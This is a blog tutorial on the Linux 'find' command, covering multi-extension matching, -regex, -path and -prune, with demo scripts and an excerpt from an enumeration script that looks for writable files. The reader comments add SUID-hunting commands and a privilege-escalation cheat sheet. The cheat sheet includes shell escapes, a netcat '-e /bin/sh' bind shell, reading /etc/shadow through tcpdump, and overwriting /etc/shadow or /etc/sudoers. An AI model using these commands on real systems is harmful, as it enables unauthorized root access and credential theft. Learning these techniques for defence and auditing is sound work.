Using the find command on Linux to search for multiple file types at once

This article was last updated on November 7, 2015, more than a year ago; if its content no longer works, please let me know, thank you!

=Start=

=The -o / -regex options of find=

The title is a bit of a mouthful, but the feature is handy. I had used it before without ever writing it up, so this post records it.

# Requirement: find all JPG and PNG image files under the current directory

# Method 1
find -maxdepth 2 -type f \( -iname \*.jpg -o -iname \*.png \)  # the -maxdepth option must come before -type
find -maxdepth 2 -type f -mtime -7 \( -name '*.jpg' -o -name '*.png' \)  # same, restricted to files modified in the last 7 days

# Method 2
find -maxdepth 2 -iregex '.*\.\(jpg\|png\)$'

# Method 3
find -maxdepth 2 -regextype posix-extended -regex '.*\.(jpg|png)$'
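As an added example (not from the original post), the script below builds a throwaway directory tree and wraps the three forms above in shell functions, so you can check that they agree and see exactly where the case-sensitive -regex form differs. The file names, the tree layout and the function names are constructed for the demo; it assumes GNU findutils, which is what the -regextype option belongs to.

```shell
#!/bin/sh
# Added example, not from the original post. Builds a throwaway tree with
# constructed file names and runs the three multi-extension forms as functions.

make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/sub/deep"
    : > "$d/a.jpg"
    : > "$d/b.PNG"          # upper-case extension: only -iname / -iregex catch it
    : > "$d/c.txt"
    : > "$d/sub/d.png"
    : > "$d/sub/e.jpeg"     # "jpeg" is not "jpg": none of the patterns match it
    : > "$d/sub/deep/f.jpg" # depth 3 below the start point: cut off by -maxdepth 2
    printf '%s\n' "$d"
}

# Method 1: two -iname tests joined by -o. The \( \) grouping is required,
# otherwise -type f would bind only to the first test (-a binds tighter than -o).
find_or() {
    find "$1" -maxdepth 2 -type f \( -iname '*.jpg' -o -iname '*.png' \) | sort
}

# Method 2: GNU find's default regex flavour is emacs, so alternation and
# grouping are written \( \| \). -iregex ignores case, like -iname does.
find_iregex() {
    find "$1" -maxdepth 2 -type f -iregex '.*\.\(jpg\|png\)$' | sort
}

# Method 3: with -regextype posix-extended the grouping is plain ( | ).
# -regex is case-sensitive, so b.PNG is NOT matched here; switch to -iregex
# if that is not what you want.
find_regex_ext() {
    find "$1" -maxdepth 2 -type f -regextype posix-extended -regex '.*\.(jpg|png)$' | sort
}

# Number of paths a given method returns, as a bare integer.
count_matches() {
    "$1" "$2" | wc -l | tr -d ' '
}

# Stand-alone run: print what each method finds, then clean up.
fixture=$(make_fixture)
for m in find_or find_iregex find_regex_ext; do
    echo "== $m"
    "$m" "$fixture"
done
rm -rf "$fixture"
```

On the constructed tree, methods 1 and 2 both return a.jpg, b.PNG and sub/d.png, while method 3 returns only the two lower-case names; sub/deep/f.jpg never appears because -maxdepth 2 cuts it off.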
Reference links:

=The -path / -prune options of find=
#looks for files we can write to that don't belong to us (note how the argument after -path is written: it carries a wildcard)
if [ "$thorough" = "1" ]; then
    grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null`
    if [ "$grfilesall" ]; then
        echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null
        echo -e "\n" |tee -a $report 2>/dev/null
    else
        :
    fi
fi

#list all world-writable files excluding /proc (-not is another spelling of the `!` negation used here)
if [ "$thorough" = "1" ]; then
    wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null`
    if [ "$wwfiles" ]; then
        echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null
        echo -e "\n" |tee -a $report 2>/dev/null
    else
        :
    fi
else
    :
fi
-path pattern
    File name matches shell pattern pattern. The metacharacters do not treat `/' or `.' specially; so, for example,
            find . -path "./sr*sc"
    will print an entry for a directory called `./src/misc' (if one exists). To ignore a whole directory tree, use -prune rather than checking every file in the tree. For example, to skip the directory `src/emacs' and all files and directories under it, and print the names of the other files found, do something like this:
            find . -path ./src/emacs -prune -o -print
    Note that the pattern match test applies to the whole file name, starting from one of the start points named on the command line. It would only make sense to use an absolute path name here if the relevant start point is also an absolute path. This means that this command will never match anything:
            find bar -path /foo/bar/myfile -print
    The predicate -path is also supported by HP-UX find and will be in a forthcoming version of the POSIX standard.

# The argument after -path is a "pattern", i.e. a shell pattern-match string. It only decides, at the very end, whether an entry is printed; the directory has already been walked by then. If you do not want a directory searched at all, use -prune, which skips it outright: faster and more efficient.

-prune
    True; if the file is a directory, do not descend into it. If -depth is given, false; no effect.  Because -delete implies -depth, you cannot usefully use -prune and -delete together.
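To make the difference between filtering with -path and skipping with -prune concrete, here is an added example (not from the original post, nor from the enumeration script quoted above). It uses a constructed tree with a skip/ directory that the search should stay out of, and one world-writable file on each side of that boundary; the function names and the layout are assumptions of the demo, and -not / -perm -2 are the GNU findutils forms the post uses.

```shell
#!/bin/sh
# Added example, not from the original post. Constructed tree: skip/ must be
# left alone, and there is one world-writable file inside it and one outside.

make_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/skip/inner" "$d/keep"
    : > "$d/keep/y";        chmod 0644 "$d/keep/y"
    : > "$d/keep/z";        chmod 0666 "$d/keep/z"        # world-writable, in scope
    : > "$d/skip/inner/x";  chmod 0666 "$d/skip/inner/x"  # world-writable, out of scope
    printf '%s\n' "$d"
}

# Filter form. find still walks into skip/; the pattern only suppresses the
# printing. Gotcha: "./skip/*" does not match "./skip" itself, so the
# directory entry still shows up in the output.
list_with_not_path() {
    ( cd "$1" && find . -not -path './skip/*' | sort )
}

# Prune form. When -path matches skip/, -prune returns true and stops the
# descent; because of -o, the -print on the right is never reached for it,
# so neither skip/ nor anything below it is printed.
list_with_prune() {
    ( cd "$1" && find . -path ./skip -prune -o -print | sort )
}

# The post's world-writable audit, scoped to the demo tree and written with
# -prune instead of "! -path". -perm -2 means "the others-write bit is set".
world_writable() {
    ( cd "$1" && find . -path ./skip -prune -o -perm -2 -type f -print | sort )
}

# Stand-alone run.
tree=$(make_tree)
echo "== -not -path (note ./skip in the list)"; list_with_not_path "$tree"
echo "== -prune";                               list_with_prune "$tree"
echo "== world-writable files outside skip/";   world_writable "$tree"
rm -rf "$tree"
```

On this tree the -not -path form lists five entries including ./skip, the -prune form lists four and never mentions skip/, and the audit reports only ./keep/z; the world-writable file under skip/ is neither visited nor reported. When the pruned directory is something like /proc, that unvisited subtree is also the difference between a quick scan and one that stalls on pseudo-files.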

=EOF=

Notice: unless stated otherwise, articles on ixyzero.com are original; when reposting, please cite this article's address as a link, thank you!
https://ixyzero.com/blog/archives/2510.html

8 thoughts on "Using the find command on Linux to search for multiple file types at once"

  1. -prune: if the matched entry is a directory, do not descend into it to keep searching. Example:
    `
    [root@localhost ~]# mkdir /etc/passs
    [root@localhost ~]# touch /etc/passs/passwd
    [root@localhost ~]# find /etc/ -name "pass*" -prune
    /etc/passs
    /etc/default/passwd
    /etc/pam.d/passwd
    /etc/passwd-
    /etc/passwd
    [root@localhost ~]# find /etc/ -name "pass*"
    /etc/passs
    /etc/passs/passwd
    /etc/default/passwd
    /etc/pam.d/passwd
    /etc/passwd-
    /etc/passwd
    `
    Reference:
    http://liwei.life/2016/07/11/find%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/

  2. suid backdoor
    `
    # find / -perm -4000 -type f -print0 2>/dev/null | xargs -0 ls -lt
    # find / -perm -4000 -user root -type f -print0 2>/dev/null | xargs -0 ls -lt
    # For our fuzzy-search needs, the '-perm -mode' form is the one to use, rather than '-perm +mode'
    `
    https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/
    http://en.wikipedia.org/wiki/Setuid
    http://joshrendek.com/2013/02/why-setuid-is-bad-and-what-you-can-do/
    https://gist.githubusercontent.com/dergachev/7916152/raw/f2a89578d2dbb89f9726153117d10b6b5a49caec/setuid-root-backdoor.md

    How to use find -perm on Linux
    http://blog.csdn.net/zbszhangbosen/article/details/7528680
    http://bbs.chinaunix.net/thread-442733-1-1.html

    1. A look into SUID-based root shell privilege escalation
      http://www.freebuf.com/articles/system/149118.html
      https://pentestlab.blog/2017/09/25/suid-executables/
      `
      SUID is a Linux permission mechanism: while a file with this bit set runs, the caller temporarily gains the privileges of the file's owner. With SUID permission, binaries and tools on the system can be used for root privilege escalation.

      Known Linux executables that can be used for privilege escalation:
      - Nmap
      - Vim
      - find
      - Bash
      - More
      - Less
      - Nano
      - cp
      `

  3. Fuzzy finder (fzf+vim): a complete usage guide
    https://keelii.com/2018/08/12/fuzzy-finder-full-guide/
    https://github.com/junegunn/fzf
    `
    Fuzzy finder is an interactive Unix command-line tool written in Go. It can be used to search any kind of list: files, Git branches, processes and so on. Any command-line tool that produces list output can be piped to fzf for searching and filtering.

    Advantages:
    Written in Go; the compiled binary has no dependencies
    Search/lookup is blazing fast
    Full-featured, with a very pleasant visual interface
    Rich surrounding plugin ecosystem (vim, tmux, fuzzy auto-completion)
    `

    A simple, fast and user-friendly alternative to ‘find’
    https://github.com/sharkdp/fd

  4. Tiny file search utility (bash)
    https://github.com/rauchg/spot
    `
    # A good example for learning bash programming

    Short & written in Bash: you can edit it easily to suit your liking.
    Fast. Just find + grep + awk.
    Searches most things by default instead of some known predefined extensions.
    Ignores .git, .hg, .svn, devices and binary files.
    `

  5. SUID privilege escalation on Linux
    https://mp.weixin.qq.com/s/UfPLm53gAlc_z28kH4OYHQ
    `
    nmap --interactive
    nmap> !sh
    sh-3.2# whoami
    root

    touch pentestlab
    find pentestlab -exec whoami \;
    find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

    vim.tiny /etc/shadow
    vim.tiny
    # Press ESC key
    :set shell=/bin/sh
    :shell

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

    less /etc/passwd

    more /home/pelle/myfile

    Use cp to overwrite /etc/shadow

    Use mv to overwrite /etc/shadow or /etc/sudoers

    awk 'BEGIN {system("/bin/bash")}'

    man passwd

    # perl
    exec "/bin/bash";

    # python
    import os
    os.system("/bin/bash")

    # tcpdump
    echo $'id\ncat /etc/shadow' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    `
